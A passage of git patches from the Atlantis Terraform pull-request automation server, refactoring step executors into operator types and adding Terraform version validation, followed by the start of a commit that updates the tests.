projCtx.RepoRelPath + return CommandResponse{ + ProjectResults: []ProjectResult{ + res, + }, + } +} + +// matchingProjects returns the list of projects whose WhenModified fields match +// any of the modifiedFiles. +func (p *PullRequestOperator) matchingProjects(modifiedFiles []string, config valid.Spec) []valid.Project { + //todo + // match the modified files against the config + // remember the modified_files paths are relative to the project paths + return nil +} diff --git a/server/events/execution_planner_test.go b/server/events/pull_request_operator_test.go similarity index 98% rename from server/events/execution_planner_test.go rename to server/events/pull_request_operator_test.go index 7b6fc7ac97..4bbdfd14b5 100644 --- a/server/events/execution_planner_test.go +++ b/server/events/pull_request_operator_test.go @@ -16,7 +16,7 @@ import ( func TestBuildStage_NoConfigFile(t *testing.T) { var defaultTFVersion *version.Version var terraformExecutor runtime.TerraformExec - e := events.ExecutionPlanner{ + e := events.PullRequestOperator{ DefaultTFVersion: defaultTFVersion, TerraformExecutor: terraformExecutor, } @@ -71,7 +71,7 @@ func TestBuildStage_NoConfigFile(t *testing.T) { func TestBuildStage(t *testing.T) { var defaultTFVersion *version.Version var terraformExecutor runtime.TerraformExec - e := events.ExecutionPlanner{ + e := events.PullRequestOperator{ DefaultTFVersion: defaultTFVersion, TerraformExecutor: terraformExecutor, } diff --git a/server/events/runtime/apply_step.go b/server/events/runtime/apply_step.go deleted file mode 100644 index 3591414815..0000000000 --- a/server/events/runtime/apply_step.go +++ /dev/null @@ -1,24 +0,0 @@ -package runtime - -import ( - "fmt" - "os" - "path/filepath" -) - -// ApplyStep runs `terraform apply`. -type ApplyStep struct { - ExtraArgs []string - Meta StepMeta -} - -func (a *ApplyStep) Run() (string, error) { - planPath := filepath.Join(a.Meta.AbsolutePath, a.Meta.Workspace+".tfplan") - stat, err := os.Stat(planPath) - if err != nil || stat.IsDir() { - return "", fmt.Errorf("no plan found at path %q and workspace %q–did you run plan?", a.Meta.DirRelativeToRepoRoot, a.Meta.Workspace) - } - - tfApplyCmd := append(append(append([]string{"apply", "-no-color"}, a.ExtraArgs...), a.Meta.ExtraCommentArgs...), planPath) - return a.Meta.TerraformExecutor.RunCommandWithVersion(a.Meta.Log, a.Meta.AbsolutePath, tfApplyCmd, a.Meta.TerraformVersion, a.Meta.Workspace) -} diff --git a/server/events/runtime/apply_step_operator.go b/server/events/runtime/apply_step_operator.go new file mode 100644 index 0000000000..819bcbf200 --- /dev/null +++ b/server/events/runtime/apply_step_operator.go @@ -0,0 +1,30 @@ +package runtime + +import ( + "fmt" + "os" + "path/filepath" + + "github.com/hashicorp/go-version" + "github.com/runatlantis/atlantis/server/events/models" +) + +// ApplyStepOperator runs `terraform apply`. +type ApplyStepOperator struct { + TerraformExecutor TerraformExec +} + +func (a *ApplyStepOperator) Run(ctx models.ProjectCommandContext, extraArgs []string, path string) (string, error) { + planPath := filepath.Join(path, ctx.Workspace+".tfplan") + stat, err := os.Stat(planPath) + if err != nil || stat.IsDir() { + return "", fmt.Errorf("no plan found at path %q and workspace %q–did you run plan?", ctx.RepoRelPath, ctx.Workspace) + } + + tfApplyCmd := append(append(append([]string{"apply", "-no-color"}, extraArgs...), ctx.CommentArgs...), planPath) + var tfVersion *version.Version + if ctx.ProjectConfig != nil && ctx.ProjectConfig.TerraformVersion != nil { + tfVersion = ctx.ProjectConfig.TerraformVersion + } + return a.TerraformExecutor.RunCommandWithVersion(ctx.Log, path, tfApplyCmd, tfVersion, ctx.Workspace) +} diff --git a/server/events/runtime/apply_step_test.go b/server/events/runtime/apply_step_operator_test.go similarity index 100% rename from server/events/runtime/apply_step_test.go rename to server/events/runtime/apply_step_operator_test.go diff --git a/server/events/runtime/approval_operator.go b/server/events/runtime/approval_operator.go new file mode 100644 index 0000000000..63731f3427 --- /dev/null +++ b/server/events/runtime/approval_operator.go @@ -0,0 +1,18 @@ +package runtime + +import ( + "github.com/runatlantis/atlantis/server/events/models" + "github.com/runatlantis/atlantis/server/events/vcs" +) + +type ApprovalOperator struct { + VCSClient vcs.ClientProxy +} + +func (a *ApprovalOperator) IsApproved(baseRepo models.Repo, pull models.PullRequest) (bool, error) { + approved, err := a.VCSClient.PullIsApproved(baseRepo, pull) + if err != nil { + return false, err + } + return approved, nil +} diff --git a/server/events/runtime/init_step.go b/server/events/runtime/init_step.go deleted file mode 100644 index 1bf5b8734d..0000000000 --- a/server/events/runtime/init_step.go +++ /dev/null @@ -1,20 +0,0 @@ -package runtime - -// InitStep runs `terraform init`. -type InitStep struct { - ExtraArgs []string - Meta StepMeta -} - -func (i *InitStep) Run() (string, error) { - // If we're running < 0.9 we have to use `terraform get` instead of `init`. - if MustConstraint("< 0.9.0").Check(i.Meta.TerraformVersion) { - i.Meta.Log.Info("running terraform version %s so will use `get` instead of `init`", i.Meta.TerraformVersion) - terraformGetCmd := append([]string{"get", "-no-color"}, i.ExtraArgs...) - _, err := i.Meta.TerraformExecutor.RunCommandWithVersion(i.Meta.Log, i.Meta.AbsolutePath, terraformGetCmd, i.Meta.TerraformVersion, i.Meta.Workspace) - return "", err - } else { - _, err := i.Meta.TerraformExecutor.RunCommandWithVersion(i.Meta.Log, i.Meta.AbsolutePath, append([]string{"init", "-no-color"}, i.ExtraArgs...), i.Meta.TerraformVersion, i.Meta.Workspace) - return "", err - } -} diff --git a/server/events/runtime/init_step_operator.go b/server/events/runtime/init_step_operator.go new file mode 100644 index 0000000000..307c91bcfe --- /dev/null +++ b/server/events/runtime/init_step_operator.go @@ -0,0 +1,29 @@ +package runtime + +import ( + "github.com/hashicorp/go-version" + "github.com/runatlantis/atlantis/server/events/models" +) + +// InitStep runs `terraform init`. +type InitStepOperator struct { + TerraformExecutor TerraformExec + DefaultTFVersion *version.Version +} + +func (i *InitStepOperator) Run(ctx models.ProjectCommandContext, extraArgs []string, path string) (string, error) { + tfVersion := i.DefaultTFVersion + if ctx.ProjectConfig != nil && ctx.ProjectConfig.TerraformVersion != nil { + tfVersion = ctx.ProjectConfig.TerraformVersion + } + // If we're running < 0.9 we have to use `terraform get` instead of `init`. + if MustConstraint("< 0.9.0").Check(tfVersion) { + ctx.Log.Info("running terraform version %s so will use `get` instead of `init`", tfVersion) + terraformGetCmd := append([]string{"get", "-no-color"}, extraArgs...) + _, err := i.TerraformExecutor.RunCommandWithVersion(ctx.Log, path, terraformGetCmd, tfVersion, ctx.Workspace) + return "", err + } else { + _, err := i.TerraformExecutor.RunCommandWithVersion(ctx.Log, path, append([]string{"init", "-no-color"}, extraArgs...), tfVersion, ctx.Workspace) + return "", err + } +} diff --git a/server/events/runtime/init_step_test.go b/server/events/runtime/init_step_operator_test.go similarity index 75% rename from server/events/runtime/init_step_test.go rename to server/events/runtime/init_step_operator_test.go index 911bcb2330..8296394977 100644 --- a/server/events/runtime/init_step_test.go +++ b/server/events/runtime/init_step_operator_test.go @@ -43,23 +43,17 @@ func TestRun_UsesGetOrInitForRightVersion(t *testing.T) { tfVersion, _ := version.NewVersion(c.version) logger := logging.NewNoopLogger() - s := runtime.InitStep{ - Meta: runtime.StepMeta{ - Log: logger, - Workspace: "workspace", - AbsolutePath: "/path", - DirRelativeToRepoRoot: ".", - TerraformVersion: tfVersion, - TerraformExecutor: terraform, - ExtraCommentArgs: []string{"comment", "args"}, - Username: "username", - }, - ExtraArgs: []string{"extra", "args"}, + iso := runtime.InitStepOperator{ + TerraformExecutor: terraform, } - When(terraform.RunCommandWithVersion(matchers.AnyPtrToLoggingSimpleLogger(), AnyString(), AnyStringSlice(), matchers2.AnyPtrToGoVersionVersion(), AnyString())). ThenReturn("output", nil) - output, err := s.Run() + output, err := iso.Run(runtime.ProjectCommandContext{ + Log: logger, + Workspace: "workspace", + AbsPath: "/path", + RepoRelPath: ".", + }, []string{"extra", "args"}) Ok(t, err) // Shouldn't return output since we don't print init output to PR. Equals(t, "", output) diff --git a/server/events/runtime/plan_step.go b/server/events/runtime/plan_step_operater.go similarity index 54% rename from server/events/runtime/plan_step.go rename to server/events/runtime/plan_step_operater.go index b8d6b3acee..a7fd6793d0 100644 --- a/server/events/runtime/plan_step.go +++ b/server/events/runtime/plan_step_operater.go @@ -5,6 +5,9 @@ import ( "os" "path/filepath" "strings" + + "github.com/hashicorp/go-version" + "github.com/runatlantis/atlantis/server/events/models" ) // atlantisUserTFVar is the name of the variable we execute terraform @@ -12,45 +15,48 @@ import ( const atlantisUserTFVar = "atlantis_user" const defaultWorkspace = "default" -// PlanStep runs `terraform plan`. -type PlanStep struct { - ExtraArgs []string - Meta StepMeta +type PlanStepOperator struct { + TerraformExecutor TerraformExec + DefaultTFVersion *version.Version } -func (p *PlanStep) Run() (string, error) { +func (p *PlanStepOperator) Run(ctx models.ProjectCommandContext, extraArgs []string, path string) (string, error) { + tfVersion := p.DefaultTFVersion + if ctx.ProjectConfig != nil && ctx.ProjectConfig.TerraformVersion != nil { + tfVersion = ctx.ProjectConfig.TerraformVersion + } + // We only need to switch workspaces in version 0.9.*. In older versions, // there is no such thing as a workspace so we don't need to do anything. - // In newer versions, the TF_WORKSPACE env var is respected and will handle - // using the right workspace and even creating it if it doesn't exist. - // This variable is set inside the Terraform executor. - if err := p.switchWorkspace(); err != nil { + if err := p.switchWorkspace(ctx, path, tfVersion); err != nil { return "", err } - planFile := filepath.Join(p.Meta.AbsolutePath, fmt.Sprintf("%s.tfplan", p.Meta.Workspace)) - userVar := fmt.Sprintf("%s=%s", atlantisUserTFVar, p.Meta.Username) - tfPlanCmd := append(append([]string{"plan", "-refresh", "-no-color", "-out", planFile, "-var", userVar}, p.ExtraArgs...), p.Meta.ExtraCommentArgs...) + planFile := filepath.Join(path, fmt.Sprintf("%s.tfplan", ctx.Workspace)) + userVar := fmt.Sprintf("%s=%s", atlantisUserTFVar, ctx.User.Username) + tfPlanCmd := append(append([]string{"plan", "-refresh", "-no-color", "-out", planFile, "-var", userVar}, extraArgs...), ctx.CommentArgs...) // Check if env/{workspace}.tfvars exist and include it. This is a use-case // from Hootsuite where Atlantis was first created so we're keeping this as // an homage and a favor so they don't need to refactor all their repos. // It's also a nice way to structure your repos to reduce duplication. - optionalEnvFile := filepath.Join(p.Meta.AbsolutePath, "env", p.Meta.Workspace+".tfvars") + optionalEnvFile := filepath.Join(path, "env", ctx.Workspace+".tfvars") if _, err := os.Stat(optionalEnvFile); err == nil { tfPlanCmd = append(tfPlanCmd, "-var-file", optionalEnvFile) } - return p.Meta.TerraformExecutor.RunCommandWithVersion(p.Meta.Log, filepath.Join(p.Meta.AbsolutePath), tfPlanCmd, p.Meta.TerraformVersion, p.Meta.Workspace) + return p.TerraformExecutor.RunCommandWithVersion(ctx.Log, filepath.Join(path), tfPlanCmd, tfVersion, ctx.Workspace) } // switchWorkspace changes the terraform workspace if necessary and will create // it if it doesn't exist. It handles differences between versions. -func (p *PlanStep) switchWorkspace() error { +func (p *PlanStepOperator) switchWorkspace(ctx models.ProjectCommandContext, path string, tfVersion *version.Version) error { // In versions less than 0.9 there is no support for workspaces. - noWorkspaceSupport := MustConstraint("<0.9").Check(p.Meta.TerraformVersion) - if noWorkspaceSupport && p.Meta.Workspace != defaultWorkspace { - return fmt.Errorf("terraform version %s does not support workspaces", p.Meta.TerraformVersion) + noWorkspaceSupport := MustConstraint("<0.9").Check(tfVersion) + // If the user tried to set a specific workspace in the comment but their + // version of TF doesn't support workspaces then error out. + if noWorkspaceSupport && ctx.Workspace != defaultWorkspace { + return fmt.Errorf("terraform version %s does not support workspaces", tfVersion) } if noWorkspaceSupport { return nil @@ -58,7 +64,7 @@ func (p *PlanStep) switchWorkspace() error { // In version 0.9.* the workspace command was called env. workspaceCmd := "workspace" - runningZeroPointNine := MustConstraint(">=0.9,<0.10").Check(p.Meta.TerraformVersion) + runningZeroPointNine := MustConstraint(">=0.9,<0.10").Check(tfVersion) if runningZeroPointNine { workspaceCmd = "env" } @@ -67,12 +73,12 @@ func (p *PlanStep) switchWorkspace() error { // already in the right workspace then no need to switch. This will save us // about ten seconds. This command is only available in > 0.10. if !runningZeroPointNine { - workspaceShowOutput, err := p.Meta.TerraformExecutor.RunCommandWithVersion(p.Meta.Log, p.Meta.AbsolutePath, []string{workspaceCmd, "show"}, p.Meta.TerraformVersion, p.Meta.Workspace) + workspaceShowOutput, err := p.TerraformExecutor.RunCommandWithVersion(ctx.Log, path, []string{workspaceCmd, "show"}, tfVersion, ctx.Workspace) if err != nil { return err } // If `show` says we're already on this workspace then we're done. - if strings.TrimSpace(workspaceShowOutput) == p.Meta.Workspace { + if strings.TrimSpace(workspaceShowOutput) == ctx.Workspace { return nil } } @@ -82,11 +88,11 @@ func (p *PlanStep) switchWorkspace() error { // we can create it if it doesn't. To do this we can either select and catch // the error or use list and then look for the workspace. Both commands take // the same amount of time so that's why we're running select here. - _, err := p.Meta.TerraformExecutor.RunCommandWithVersion(p.Meta.Log, p.Meta.AbsolutePath, []string{workspaceCmd, "select", "-no-color", p.Meta.Workspace}, p.Meta.TerraformVersion, p.Meta.Workspace) + _, err := p.TerraformExecutor.RunCommandWithVersion(ctx.Log, path, []string{workspaceCmd, "select", "-no-color", ctx.Workspace}, tfVersion, ctx.Workspace) if err != nil { // If terraform workspace select fails we run terraform workspace // new to create a new workspace automatically. - _, err = p.Meta.TerraformExecutor.RunCommandWithVersion(p.Meta.Log, p.Meta.AbsolutePath, []string{workspaceCmd, "new", "-no-color", p.Meta.Workspace}, p.Meta.TerraformVersion, p.Meta.Workspace) + _, err = p.TerraformExecutor.RunCommandWithVersion(ctx.Log, path, []string{workspaceCmd, "new", "-no-color", ctx.Workspace}, tfVersion, ctx.Workspace) return err } return nil diff --git a/server/events/runtime/plan_step_test.go b/server/events/runtime/plan_step_operater_test.go similarity index 100% rename from server/events/runtime/plan_step_test.go rename to server/events/runtime/plan_step_operater_test.go diff --git a/server/events/runtime/repoconfig.go b/server/events/runtime/repoconfig.go deleted file mode 100644 index 0880920fb5..0000000000 --- a/server/events/runtime/repoconfig.go +++ /dev/null @@ -1,93 +0,0 @@ -package runtime - -import ( - "github.com/hashicorp/go-version" - "github.com/runatlantis/atlantis/server/logging" -) - -type TerraformExec interface { - RunCommandWithVersion(log *logging.SimpleLogger, path string, args []string, v *version.Version, workspace string) (string, error) -} - -type ApplyRequirement interface { - // IsMet returns true if the requirement is met and false if not. - // If it returns false, it also returns a string describing why not. - IsMet() (bool, string) -} - -type PlanStage struct { - Steps []Step - Workspace string - ProjectPath string -} - -type ApplyStage struct { - Steps []Step - ApplyRequirements []ApplyRequirement -} - -func (p PlanStage) Run() (string, error) { - var outputs string - for _, step := range p.Steps { - out, err := step.Run() - if err != nil { - return outputs, err - } - if out != "" { - // Outputs are separated by newlines. - outputs += "\n" + out - } - } - return outputs, nil -} - -func (a ApplyStage) Run() (string, error) { - var outputs string - for _, step := range a.Steps { - out, err := step.Run() - if err != nil { - return outputs, err - } - if out != "" { - // Outputs are separated by newlines. - outputs += "\n" + out - } - } - return outputs, nil -} - -type Step interface { - // Run runs the step. It returns any output that needs to be commented back - // onto the pull request and error. - Run() (string, error) -} - -// StepMeta is the data that is available to all steps. -type StepMeta struct { - Log *logging.SimpleLogger - Workspace string - // AbsolutePath is the path to this project on disk. It's not necessarily - // the repository root since a project can be in a subdir of the root. - AbsolutePath string - // DirRelativeToRepoRoot is the directory for this project relative - // to the repo root. - DirRelativeToRepoRoot string - TerraformVersion *version.Version - TerraformExecutor TerraformExec - // ExtraCommentArgs are the arguments that may have been appended to the comment. - // For example 'atlantis plan -- -target=resource'. They are already quoted - // further up the call tree to mitigate security issues. - ExtraCommentArgs []string - // VCS username of who caused this step to be executed. For example the - // commenter, or who pushed a new commit. - Username string -} - -// MustConstraint returns a constraint. It panics on error. -func MustConstraint(constraint string) version.Constraints { - c, err := version.NewConstraint(constraint) - if err != nil { - panic(err) - } - return c -} diff --git a/server/events/runtime/run_step.go b/server/events/runtime/run_step.go deleted file mode 100644 index ba6dbe3859..0000000000 --- a/server/events/runtime/run_step.go +++ /dev/null @@ -1,35 +0,0 @@ -package runtime - -import ( - "fmt" - "os/exec" - "strings" - - "github.com/pkg/errors" -) - -// RunStep runs custom commands. -type RunStep struct { - Commands []string - Meta StepMeta -} - -func (r *RunStep) Run() (string, error) { - if len(r.Commands) < 1 { - return "", errors.New("no commands for run step") - } - path := r.Meta.AbsolutePath - - cmd := exec.Command("sh", "-c", strings.Join(r.Commands, " ")) // #nosec - cmd.Dir = path - out, err := cmd.CombinedOutput() - - commandStr := strings.Join(r.Commands, " ") - if err != nil { - err = fmt.Errorf("%s: running %q in %q: \n%s", err, commandStr, path, out) - r.Meta.Log.Debug("error: %s", err) - return string(out), err - } - r.Meta.Log.Info("successfully ran %q in %q", commandStr, path) - return string(out), nil -} diff --git a/server/events/runtime/run_step_operator.go b/server/events/runtime/run_step_operator.go new file mode 100644 index 0000000000..6554527be6 --- /dev/null +++ b/server/events/runtime/run_step_operator.go @@ -0,0 +1,33 @@ +package runtime + +import ( + "fmt" + "os/exec" + "strings" + + "github.com/pkg/errors" + "github.com/runatlantis/atlantis/server/events/models" +) + +// RunStepOperator runs custom commands. +type RunStepOperator struct { +} + +func (r *RunStepOperator) Run(ctx models.ProjectCommandContext, command []string, path string) (string, error) { + if len(command) < 1 { + return "", errors.New("no commands for run step") + } + + cmd := exec.Command("sh", "-c", strings.Join(command, " ")) // #nosec + cmd.Dir = path + out, err := cmd.CombinedOutput() + + commandStr := strings.Join(command, " ") + if err != nil { + err = fmt.Errorf("%s: running %q in %q: \n%s", err, commandStr, path, out) + ctx.Log.Debug("error: %s", err) + return string(out), err + } + ctx.Log.Info("successfully ran %q in %q", commandStr, path) + return string(out), nil +} diff --git a/server/events/runtime/run_step_test.go b/server/events/runtime/run_step_operator_test.go similarity index 100% rename from server/events/runtime/run_step_test.go rename to server/events/runtime/run_step_operator_test.go diff --git a/server/events/runtime/runtime.go b/server/events/runtime/runtime.go index ea70550a68..8e599ff659 100644 --- a/server/events/runtime/runtime.go +++ b/server/events/runtime/runtime.go @@ -2,3 +2,21 @@ // based on configuration and defaults. The handlers can then execute this // graph. package runtime + +import ( + "github.com/hashicorp/go-version" + "github.com/runatlantis/atlantis/server/logging" +) + +type TerraformExec interface { + RunCommandWithVersion(log *logging.SimpleLogger, path string, args []string, v *version.Version, workspace string) (string, error) +} + +// MustConstraint returns a constraint. It panics on error. +func MustConstraint(constraint string) version.Constraints { + c, err := version.NewConstraint(constraint) + if err != nil { + panic(err) + } + return c +} diff --git a/server/events/terraform/terraform_client.go b/server/events/terraform/terraform_client.go index a3508be724..55ed5d687e 100644 --- a/server/events/terraform/terraform_client.go +++ b/server/events/terraform/terraform_client.go @@ -87,14 +87,17 @@ func (c *DefaultClient) Version() *version.Version { } // RunCommandWithVersion executes the provided version of terraform with -// the provided args in path. v is the version of terraform executable to use -// and workspace is the workspace specified by the user commenting -// "atlantis plan/apply {workspace}" which is set to "default" by default. +// the provided args in path. v is the version of terraform executable to use. +// If v is nil, will use the default version. +// Workspace is the terraform workspace to run in. We won't switch workspaces +// but will set the TERRAFORM_WORKSPACE environment variable. func (c *DefaultClient) RunCommandWithVersion(log *logging.SimpleLogger, path string, args []string, v *version.Version, workspace string) (string, error) { tfExecutable := "terraform" + tfVersionStr := c.defaultVersion.String() // if version is the same as the default, don't need to prepend the version name to the executable - if !v.Equal(c.defaultVersion) { + if v != nil && !v.Equal(c.defaultVersion) { tfExecutable = fmt.Sprintf("%s%s", tfExecutable, v.String()) + tfVersionStr = v.String() } // set environment variables @@ -115,7 +118,7 @@ func (c *DefaultClient) RunCommandWithVersion(log *logging.SimpleLogger, path st // because it's probably safer for users to rely on it. Terraform might // change the way TF_WORKSPACE works in the future. fmt.Sprintf("WORKSPACE=%s", workspace), - fmt.Sprintf("ATLANTIS_TERRAFORM_VERSION=%s", v.String()), + fmt.Sprintf("ATLANTIS_TERRAFORM_VERSION=%s", tfVersionStr), fmt.Sprintf("DIR=%s", path), } envVars = append(envVars, os.Environ()...) diff --git a/server/events/yaml/raw/project.go b/server/events/yaml/raw/project.go index be9ce1980b..3273cb38a1 100644 --- a/server/events/yaml/raw/project.go +++ b/server/events/yaml/raw/project.go @@ -6,6 +6,7 @@ import ( "strings" "github.com/go-ozzo/ozzo-validation" + "github.com/hashicorp/go-version" "github.com/runatlantis/atlantis/server/events/yaml/valid" ) @@ -39,9 +40,17 @@ func (p Project) Validate() error { } return nil } + validTFVersion := func(value interface{}) error { + // Safe to dereference because this is only called if the pointer is + // not nil. + versionStr := *value.(*string) + _, err := version.NewVersion(versionStr) + return err + } return validation.ValidateStruct(&p, validation.Field(&p.Dir, validation.Required, validation.By(hasDotDot)), validation.Field(&p.ApplyRequirements, validation.By(validApplyReq)), + validation.Field(&p.TerraformVersion, validation.By(validTFVersion)), ) } @@ -56,7 +65,9 @@ func (p Project) ToValid() valid.Project { } v.Workflow = p.Workflow - v.TerraformVersion = p.TerraformVersion + if p.TerraformVersion != nil { + v.TerraformVersion, _ = version.NewVersion(*p.TerraformVersion) + } if p.Autoplan == nil { v.Autoplan = DefaultAutoPlan() } else { diff --git a/server/events/yaml/valid/valid.go b/server/events/yaml/valid/valid.go index 75d79a3d93..0a7ef2e972 100644 --- a/server/events/yaml/valid/valid.go +++ b/server/events/yaml/valid/valid.go @@ -1,5 +1,7 @@ package valid +import "github.com/hashicorp/go-version" + // Spec is the atlantis yaml spec after it's been parsed and validated. // The raw.Spec is transformed into the ValidSpec which is then used by the // rest of Atlantis. @@ -11,11 +13,38 @@ type Spec struct { Workflows map[string]Workflow } +func (s Spec) GetPlanStage(workflowName string) *Stage { + for name, flow := range s.Workflows { + if name == workflowName { + return flow.Plan + } + } + return nil +} + +func (s Spec) GetApplyStage(workflowName string) *Stage { + for name, flow := range s.Workflows { + if name == workflowName { + return flow.Apply + } + } + return nil +} + +func (s Spec) FindProject(dir string, workspace string) *Project { + for _, p := range s.Projects { + if p.Dir == dir && p.Workspace == workspace { + return &p + } + } + return nil +} + type Project struct { Dir string Workspace string Workflow *string - TerraformVersion *string + TerraformVersion *version.Version Autoplan Autoplan ApplyRequirements []string } diff --git a/server/server.go b/server/server.go index 368553a0ea..fe6e3f7b5f 100644 --- a/server/server.go +++ b/server/server.go @@ -36,7 +36,7 @@ import ( "github.com/runatlantis/atlantis/server/events/locking" "github.com/runatlantis/atlantis/server/events/locking/boltdb" "github.com/runatlantis/atlantis/server/events/models" - "github.com/runatlantis/atlantis/server/events/run" + "github.com/runatlantis/atlantis/server/events/runtime" "github.com/runatlantis/atlantis/server/events/terraform" "github.com/runatlantis/atlantis/server/events/vcs" "github.com/runatlantis/atlantis/server/events/webhooks" @@ -188,23 +188,12 @@ func NewServer(userConfig UserConfig, config Config) (*Server, error) { return nil, err } lockingClient := locking.NewClient(boltdb) - run := &run.Run{} - configReader := &events.ProjectConfigManager{} workspaceLocker := events.NewDefaultAtlantisWorkspaceLocker() workspace := &events.FileWorkspace{ DataDir: userConfig.DataDir, } projectLocker := &events.DefaultProjectLocker{ - Locker: lockingClient, - Run: run, - ConfigReader: configReader, - Terraform: terraformClient, - } - executionPlanner := &events.ExecutionPlanner{ - ParserValidator: &yaml.ParserValidator{}, - DefaultTFVersion: terraformClient.Version(), - TerraformExecutor: terraformClient, - ProjectFinder: &events.DefaultProjectFinder{}, + Locker: lockingClient, } underlyingRouter := mux.NewRouter() router := &Router{ @@ -213,27 +202,6 @@ func NewServer(userConfig UserConfig, config Config) (*Server, error) { LockViewRouteName: LockViewRouteName, Underlying: underlyingRouter, } - applyExecutor := &events.ApplyExecutor{ - VCSClient: vcsClient, - Terraform: terraformClient, - RequireApproval: userConfig.RequireApproval, - Run: run, - AtlantisWorkspace: workspace, - ProjectLocker: projectLocker, - ExecutionPlanner: executionPlanner, - Webhooks: webhooksManager, - } - planExecutor := &events.PlanExecutor{ - VCSClient: vcsClient, - Terraform: terraformClient, - Run: run, - Workspace: workspace, - ProjectLocker: projectLocker, - Locker: lockingClient, - ProjectFinder: &events.DefaultProjectFinder{}, - ExecutionPlanner: executionPlanner, - LockURLGenerator: router, - } pullClosedExecutor := &events.PullClosedExecutor{ VCSClient: vcsClient, Locker: lockingClient, @@ -252,9 +220,8 @@ func NewServer(userConfig UserConfig, config Config) (*Server, error) { GitlabUser: userConfig.GitlabUser, GitlabToken: userConfig.GitlabToken, } + defaultTfVersion := terraformClient.Version() commandHandler := &events.CommandHandler{ - ApplyExecutor: applyExecutor, - PlanExecutor: planExecutor, EventParser: eventParser, VCSClient: vcsClient, GithubPullGetter: githubClient, @@ -265,6 +232,35 @@ func NewServer(userConfig UserConfig, config Config) (*Server, error) { Logger: logger, AllowForkPRs: userConfig.AllowForkPRs, AllowForkPRsFlag: config.AllowForkPRsFlag, + PullRequestOperator: events.PullRequestOperator{ + TerraformExecutor: terraformClient, + DefaultTFVersion: defaultTfVersion, + ParserValidator: &yaml.ParserValidator{}, + ProjectFinder: &events.DefaultProjectFinder{}, + VCSClient: vcsClient, + Workspace: workspace, + ProjectOperator: events.ProjectOperator{ + Locker: projectLocker, + LockURLGenerator: router, + InitStepOperator: runtime.InitStepOperator{ + TerraformExecutor: terraformClient, + DefaultTFVersion: defaultTfVersion, + }, + PlanStepOperator: runtime.PlanStepOperator{ + TerraformExecutor: terraformClient, + DefaultTFVersion: defaultTfVersion, + }, + ApplyStepOperator: runtime.ApplyStepOperator{ + TerraformExecutor: terraformClient, + }, + RunStepOperator: runtime.RunStepOperator{}, + ApprovalOperator: runtime.ApprovalOperator{ + VCSClient: vcsClient, + }, + Workspace: workspace, + Webhooks: webhooksManager, + }, + }, } repoWhitelist := &events.RepoWhitelist{ Whitelist: userConfig.RepoWhitelist, From 8ab4857f77bc163db01ccea6bdb154fd33d63ee3 Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Fri, 15 Jun 2018 16:16:31 +0100 Subject: [PATCH 22/69] Fix all tests --- server/events/command_handler_test.go | 21 +- server/events/markdown_renderer_test.go | 75 ++++--- .../mocks/mock_pull_request_operator.go | 154 ++++++++++++++ server/events/pull_request_operator.go | 18 +- server/events/pull_request_operator_test.go | 198 ------------------ .../runtime/apply_step_operator_test.go | 83 +++++--- .../events/runtime/init_step_operator_test.go | 10 +- .../events/runtime/plan_step_operater_test.go | 144 ++++++------- server/events/yaml/parser_validator_test.go | 6 +- server/events/yaml/raw/project.go | 13 +- server/events/yaml/raw/project_test.go | 44 +++- server/events_controller_test.go | 94 ++++++--- server/logging/simple_logger.go | 2 - server/server.go | 2 +- 14 files changed, 458 insertions(+), 406 deletions(-) create mode 100644 server/events/mocks/mock_pull_request_operator.go diff --git a/server/events/command_handler_test.go b/server/events/command_handler_test.go index 598ed6e234..65bcf3c6f5 100644 --- a/server/events/command_handler_test.go +++ b/server/events/command_handler_test.go @@ -33,8 +33,7 @@ import ( . "github.com/runatlantis/atlantis/testing" ) -var applier *mocks.MockExecutor -var planner *mocks.MockExecutor +var operator *mocks.MockPullRequestOperator var eventParsing *mocks.MockEventParsing var vcsClient *vcsmocks.MockClientProxy var ghStatus *mocks.MockCommitStatusUpdater @@ -46,8 +45,7 @@ var logBytes *bytes.Buffer func setup(t *testing.T) { RegisterMockTestingT(t) - applier = mocks.NewMockExecutor() - planner = mocks.NewMockExecutor() + operator = mocks.NewMockPullRequestOperator() eventParsing = mocks.NewMockEventParsing() ghStatus = mocks.NewMockCommitStatusUpdater() workspaceLocker = mocks.NewMockAtlantisWorkspaceLocker() @@ -58,8 +56,6 @@ func setup(t *testing.T) { logBytes = new(bytes.Buffer) When(logger.Underlying()).ThenReturn(log.New(logBytes, "", 0)) ch = events.CommandHandler{ - PlanExecutor: planner, - ApplyExecutor: applier, VCSClient: vcsClient, CommitStatusUpdater: ghStatus, EventParser: eventParsing, @@ -67,9 +63,10 @@ func setup(t *testing.T) { MarkdownRenderer: &events.MarkdownRenderer{}, GithubPullGetter: githubGetter, GitlabMergeRequestGetter: gitlabGetter, - Logger: logger, - AllowForkPRs: false, - AllowForkPRsFlag: "allow-fork-prs-flag", + Logger: logger, + AllowForkPRs: false, + AllowForkPRsFlag: "allow-fork-prs-flag", + PullRequestOperator: operator, } } @@ -203,9 +200,9 @@ func TestExecuteCommand_FullRun(t *testing.T) { When(workspaceLocker.TryLock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)).ThenReturn(true) switch c { case events.Plan: - When(planner.Execute(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResponse) + When(operator.PlanViaComment(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResponse) case events.Apply: - When(applier.Execute(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResponse) + When(operator.ApplyViaComment(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResponse) } ch.ExecuteCommand(fixtures.GithubRepo, fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, &cmd) @@ -238,7 +235,7 @@ func TestExecuteCommand_ForkPREnabled(t *testing.T) { headRepo.Owner = "forkrepo" When(eventParsing.ParseGithubPull(&pull)).ThenReturn(fixtures.Pull, headRepo, nil) When(workspaceLocker.TryLock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)).ThenReturn(true) - When(planner.Execute(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResponse) + When(operator.PlanViaComment(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResponse) ch.ExecuteCommand(fixtures.GithubRepo, models.Repo{} /* this isn't used */, fixtures.User, fixtures.Pull.Num, &cmd) diff --git a/server/events/markdown_renderer_test.go b/server/events/markdown_renderer_test.go index 287996ea44..414d300810 100644 --- a/server/events/markdown_renderer_test.go +++ b/server/events/markdown_renderer_test.go @@ -125,9 +125,11 @@ func TestRenderProjectResults(t *testing.T) { TerraformOutput: "terraform-output", LockURL: "lock-url", }, 